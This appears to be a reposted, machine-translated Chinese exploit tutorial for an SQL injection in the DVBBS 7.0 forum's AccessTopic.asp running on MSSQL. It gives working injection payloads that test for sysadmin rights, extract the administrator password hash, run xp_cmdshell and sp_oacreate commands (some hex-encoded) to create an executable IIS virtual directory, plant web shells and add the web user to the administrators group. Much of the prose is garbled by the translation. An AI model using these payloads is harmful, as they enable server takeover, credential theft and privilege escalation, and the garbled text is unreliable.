DVBBS7.0 ----- Smile behind the scenes

xiaoxiao2021-03-06 40

Vulnerability file: Accesstopic.asp

Impact version: DVBBS7.0 No version MSSQL

Test version: DVBBS7.0 SP1 MSSQL

Test environment: Windows 2000 Advanced Server SQL Server 2000

sequence

Since the release of its reputation and praise in the ASP forum, since the release of the ASP Forum, there is a great progress in the art, performance, safety and efficiency. The only feeling that gives me when reading the code is - US. But there is no non-winding wall in the world, and the code is written and then rigorous and there will be negligence. In order to find out its vulnerability, I am looking for a big sea, I'm looking for the code, and I look back that the man is in a dim light. Please take a look at me.

The first discovering new mainland

Open AccessTopic.asp file, turn it up to 200-212, the content is:

......

SUB FREETOPIC ()

......

For i = 1 to Request.form ("AnnounceID"). Count

ID = Replace (Request.form ("AnnounceID") (i), "'", "")

'delete

If Request ("ActionType") = 2 THEN

SET RS = DVBBS.EXECUTE ("Select Rootid from" & Dvbbs.nowusebbs & "Where ParentId = 0 and AnnounceId =" & id)

IF not (rs.eof and ly) THEN

Dvbbs.execute ("delete from dv_topic where topicid =" & r (0))

Dvbbs.execute ("delete from" & dvbbs.nowusebbs & "where rootid =" & r (0))

FoundID = rs (0)

Else

Dvbbs.execute ("delete from" & dvbbs.nowusebbs & "where announceId =" & id)

FoundID = 0

END IF

......

Obviously, the value of Request.form ("Ann CountyID") is only filtered by single quotes, but fortunately it is not used as a string in the SQL statement, or there is no play. If you want to break through this single quotation limit, you can use it directly to convert the string we need to use SQL Encoder. The basic principle is that automatically converts the data type data of the Varbinary type into varchatr type data in MSSQL, but this is generally unable to distinguish in the ASP. In the next operation, the part involved in the string is for easy understanding, I have retained the original text. In actual operation, use SQL ENCODER to convert unless special conditions are not described.

Second Art Network Forum's small shoes

This file is in the mobile network forum is the operation of each of the processes to be reviewed, and the process of discovering the loopholes is to delete a post ("ActionType") = 2). However, this feature is only available when the review feature opens a layout of posts, and only bamboo can use, its logo variable is the 4th number of DV_Board.boardSetting columns in the data.

Since this feature is closed by default, most of the forums will not be used, so it is rated as a low-risk level. When we use, we can imagine the ability to get the Access database, as if it is a mentally wise, there is no use value, so I only discuss the use of the MSSQL database. You may think that if you can't use an error, you can use an error to get the administrator's password de MD5 cipher, this is wrong. The execution of each SQL statement in the forum is implemented by the process of dvbbs.execute, the relevant code can be found in inc / dv_clsmain.asp, filtering the DV_ADMIN keyword during this process, I thought about it at first time. Use special methods to construct the statement, but all failures, if you have any way to succeed, don't forget to tell me.

Since AnnounceID is obtained with request.form, the local submission form is to be constructed when it is used, and its content is:

</ textarea></p> <p><Input Name = Submit Value = "Execute" Type = Submit></p> <p></ form></p> <p>As long as you meet the above conditions, you can look down after setting the value in the form.</p> <p>The third article knows that his power must judge the privilege of the current database user before obtaining the absolute path. Here, there is a problem, regardless of whether the statement we submit is established, as long as there is no mistake, the return information is the same. . You may have already thought that it is to set the value of AnnounceID to an existing to be reviewed. After submit success, if this post has been deleted, it means that our condition is correct, otherwise it is wrong. In order to facilitate, assuming that each execution is used to use the already available BoardID = 1 post. Since only sysadmin is useful in all permissions in the database, you can justify it. Open the form we just constructed and log in with this version of the master account in another page. The following operation is done under this condition, so no longer mention. Therefore, in TextArea: 1 and 1 = (select is_srvrolemember ('sysadmin')) After submitting, the result is known according to the judgment conditions mentioned above. You can also use this method to determine if there is XP_cmdshell storage extension, the submission statement is 1 and 1 = (select count (*) from master.dbo.sysObjects where xtype = 'x' and name = 'xp_cmdshell') if not If the authority can use the error to see the password of the front desk administrator, the statement you need to submit is: 1 and 1 = (SELECT TOP 1 UserPassword from DV_USER where usergroupid = 1) If you want yourself to get the permissions inside the forum If you upgrade, you will crack this MD5 cps - it is said to be very difficult. However, in the case of sysadmin privileges, it is equivalent to obtaining an absolute control of the server - executed with system permission in the operating system. Then I look down how I use this permission. The fourth article is looking for the Roman Road on the Skinction of the Roman Road. It is mentioned that the method of reading the registry with XP_REGREAD is stored in the method of reading the registry, but after my test, this method can only be installed when the web server is installed. The default path, if the administrator is smart enough, it will definitely modify this value, which will result in the failure of uploading the ASP Trojan. I think you may have to experience this situation.</p> <p>Now I have changed my idea, since this path can't get this path, then build a virtual directory problem with our path to build a virtual directory problem? After submitting the following statement, you can implement this operation: 1; Exec ('master.dbo.xp_cmdshell' CScript C: /inetpub/adminscripts/mkwebdir.vbs -c localhost -w "1" -v "win", "c: / winnt /" '') Exec ('master.dbo.xp_cmdshell' Cscript C: /inetpub/adminscript c: /inetpub/adminscripts/adsutil.vbs set w3svc / 1 / root / win / accessexecute true '') The default server establishes a virtual directory named WIN, which is absolutely path to C: / WinNT /, and has permissions to perform dynamic scripts. About MkwebDir.vbs and Adsutil.vbs can refer to Microsoft's MSDN it than I Lect to understand. Now you can judge whether to create success by accessing http://www.sitename.com/win/: Returns 403 Error Description Create success, return 500 error Description Creation failed. You may find a problem, submit the statement without success after using the SQL Encoder encoding, is there an error in the statement? But if you test in the query analyzer, he will succeed, the problem is on the issue of data type conversion. In MSSQL, the exec function cannot perform this data type conversion we required, so there is a need to operate in another operation.</p> <p>Submit the correct code: 1; declare @a nvarchar (255); select @ a = 0x6d00610073007400650072002e00640062006f002e00780070005f0063006d0064007300680065006c006c00200027006300730063007200690070007400200063003a005c0069006e00650074007000750062005c00610064006d0069006e0073006300720069007000740073005c006d006b007700650062006400690072002e0076006200730020002d00630020006c006f00630061006c0068006f007300740020002d007700200022003100220020002d00760020002200770069006e0022002c00220063003a005c00770069006e006e0074005c0022002700; exec (@a); select @ a = 0x6d00610073007400650072002e00640062006f002e00780070005f0063006d0064007300680065006c006c00200027006300730063007200690070007400200063003a005c0069006e00650074007000750062005c00610064006d0069006e0073006300720069007000740073002f006100640073007500740069006c002e0076006200730020007300650074002000770033007300760063002f0031002f0072006f006f0074002f00770069006e002f006100630063006500730073006500780065006300750074006500200074007200750065002700; exec (@a); a first declare nvarchar (255) type variable Then let the assignment operator conversion to the data type. It is also important to pay attention to the single quotes inside the string in MSSQL to use two single quotes, but when we use SQL Encoder to encode, you must adhere to the policy of single quotes, perform expressions that cannot be converted. Give the assignment operator policy. This method is basically used in the following code, so you must remember it for flexible use. Maybe you will encounter the server without xp_cmdshell, and this time has not yet obtained the web absolute path, and establishing the WebShell will not talk at all. Don't be discouraged by this situation, and we have another way to complete this operation.</p> <p>Submit the following statement: 1; declare @o int; exec sp_oacreate 'wscript.shell', @ o out; exec sp_oamethod @ O, 'Run', NULL, 'CScript c: /inetpub/adminscripts/mkwebdir.vbs -c localhost -w "1" -V "win", "c: / winnt /"; exec sp_oacreate 'wscript.shell', @ o out; exec sp_oamethod @ O, 'Run', NULL, 'CScript C: / inetpub / Adminscripts / Adsutil.vbs Set W3SVC / 1 / Root / Win / AccessExecute True '; as for the data type conversion problem can be solved using the methods just mentioned. When the administrator will pay attention to the two storage extensions of sp_oacreate and sp_oamethod, you can use it with confidence. Now that the mainland leading to Rome is in front of us, let us run! What, you say that driving is faster? The fifth article learns the WEB absolute path after opening the running car, it can be written to WebShell. According to I know, there are five ways to achieve: 1. NEVER's method of using data backup, although there is a lot of spam The generation, but the requirements for permissions are very low, and the specific articles can be referred to in their related articles; 2. CZY uses sp_makewebtask to store the extension exported table data, the additional amount of data is small and avoids the use of XP_cmdshell storage extensions, This method I have given a detailed code in sp_makewebtask.txt; 3. Use XP_cmdshell to perform batch methods, this method is more practical, there is no more than data write problems, you can find in the xp_cmdshell.txt file Detailed content. Can be used to connect to the server 80 port - If there is 3389, use me? 4. Use sp_oacreate and sp_oAMethod, two storage extensions executes batch processing, the conditions used are the same as XP_cmdshell, and because this method is almost all the same as the 3rd, it will no longer give the code; 5. Use sp_oacreate and sp_oAmethod These two storage extensions call the scripting.filesystemObject object to create and write operations, using the conditions. There is a detailed code in sp_oacreate & sp_oamethod.txt file. The WebShell code given in the above method is CMD.asp modified from the top of the ocean. After the simplification, only 13 lines of key parts are simplified, and the details see cmd.txt. How did you open the car to open the road? The actual situation is, and Grandpa Tell us that the specific situation is specific to the specific situation! The sixth one will definitely discover the SYSTEM permissions in the database to create a guests permission after establishing WebShell, which is not a waste! In order to inherit the glorious tradition of diligence, you can perform the following SQL statement will be wasted to the lowest level: EXEC ('master.dbo.xp_cmdshell' 'Net localgroup administrators IUSR _' ' host_name () ' '/ add' ' Of course, the two storage extensions executed by sp_oacreate and sp_oamethod can also be, the key is that flexible use, for time to apply,</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-86020.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="86020" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.047</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'MY0Chhlr7EP1pauOoi2RsadX0_2FvKvnKeGDTI6vgjm_2BmkcPlczDnCATuwBOoLa4TWkpXBMgL4sPTDX_2Fn9j5TX8w_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>